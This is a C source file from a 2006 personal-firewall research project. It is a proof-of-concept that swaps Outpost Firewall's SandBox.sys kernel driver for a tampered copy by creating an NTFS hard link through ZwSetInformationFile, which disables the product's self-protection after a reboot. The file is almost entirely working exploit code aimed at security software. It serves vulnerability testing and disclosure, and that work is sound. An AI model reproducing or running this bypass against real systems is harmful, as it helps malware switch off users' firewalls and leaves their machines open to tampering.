/*

 Testing program for Bypassing Self-Protection using file links (BTP00003P004AO)
 

 Usage:
 prog INSTDIR
   INSTDIR - Outpost installation directory

 Description:
 This program uses native Windows API function ZwSetInformationFile to replace "SandBox.sys" 
 with a fake copy of this driver. The fake driver used by this testing program is an original 
 "SandBox.sys" that was modified not to install Self-Protection SSDT hooks. After the system is reboot 
 Outpost Self-Protection does not work and Outpost is exposed to common manipulation. 
 For example files in the Outpost installation directory can be deleted or renamed.

 Test:
 Running the testing program with a path to the Outpost installation directory as an argument, 
 restarting the system and an attempt to delete some files in the installation directory.

*/

#define _WIN32_WINNT 0x0500
#undef __STRICT_ANSI__
#include <stdio.h>
#include <windows.h>
#include <ddk/ntapi.h>
#include <ddk/ntifs.h>

void about(void)
{
  printf("Testing program for Bypassing Self-Protection using file links (BTP00003P004AO)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2006 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/""\n\n");
  return;
}

void usage(void)
{
  printf("Usage: test INSTDIR\n"
         "  INSTDIR - Outpost installation directory\n");
  return;
}

void print_last_error()
{
  LPTSTR buf;
  DWORD code=GetLastError();
  if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
  {
    fprintf(stderr,"Error code: %ld\n",code);
    fprintf(stderr,"Error message: %s",buf);
    LocalFree(buf);
  } else fprintf(stderr,"Unable to format error message for code %ld.\n",code);
  return;
}



/*
 name_to_native converts classic windows file name like "c:\test.txt"
 to native format like L"\??\c:\test.txt"
 the return value is NULL if the function fails
 otherwise it is a mallocated pointer to UNICODE_STRING that must be freed
*/

PUNICODE_STRING name_to_native(char *name)
{
  char *buf=malloc(sizeof(UNICODE_STRING)+2*MAX_PATH*sizeof(wchar_t));
  if (!buf) return NULL;


  PUNICODE_STRING us=(PUNICODE_STRING)buf;
  wchar_t *usbuf=(wchar_t*)(&buf[sizeof(UNICODE_STRING)]);

  wchar_t namew[MAX_PATH];
  snwprintf(namew,MAX_PATH,L"%S",name);

  us->Length=0;
  us->MaximumLength=2*MAX_PATH;
  us->Buffer=usbuf;
  
  if (RtlDosPathNameToNtPathName_U(namew,us,NULL,NULL)) return us;
  else return NULL;
}


/*
 create_link replaces destination with NTFS link to source
 the return value is TRUE if the link was created, FALSE otherwise
*/

int create_link(char *source,char *destination)
{
  HANDLE file=CreateFile(source,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL);
  if (file==INVALID_HANDLE_VALUE)
  {
    fprintf(stderr,"Unable to open file \"%s\".\n",source);
    print_last_error();
    return FALSE;
  }

  int res=FALSE;
  IO_STATUS_BLOCK iosb;

  char buf[sizeof(FILE_LINK_INFORMATION)+2*MAX_PATH*sizeof(wchar_t)];
  PFILE_LINK_INFORMATION info=(PVOID)buf;
  info->ReplaceIfExists=TRUE;
  info->RootDirectory=0;

  PUNICODE_STRING ntname=name_to_native(destination);
  if (ntname)
  {
    info->FileNameLength=ntname->Length;
    wcsncpy(info->FileName,ntname->Buffer,ntname->Length);

    NTSTATUS stat=ZwSetInformationFile(file,&iosb,info,sizeof(FILE_LINK_INFORMATION)+info->FileNameLength,FileLinkInformation);
    if (NT_SUCCESS(stat))
    {
      printf("Link \"%s\" to \"%s\" created.\n",destination,source);
      res=TRUE;
    } else fprintf(stderr,"Unable to create link \"%s\" to \"%s\", ZwSetInformationFile returned 0x%lX.\n",destination,source,stat);

    free(ntname);
  }
  CloseHandle(file);
  return res;
}



int main(int argc,char **argv)
{
  about();

  if (argc!=2)
  {
    usage();
    return 1;
  }

  char sandbox[MAX_PATH];
  snprintf(sandbox,MAX_PATH,"%s\\Kernel\\SandBox.sys",argv[1]);

  if (create_link("FakeSandBox.sys",sandbox))
  {
    printf("\nTEST SUCCESSFUL!\n");
    return 0;
  }

  fprintf(stderr,"Unable to create hard link.\n");
  printf("\nTEST FAILED!\n");
  return 1;
}
                                  
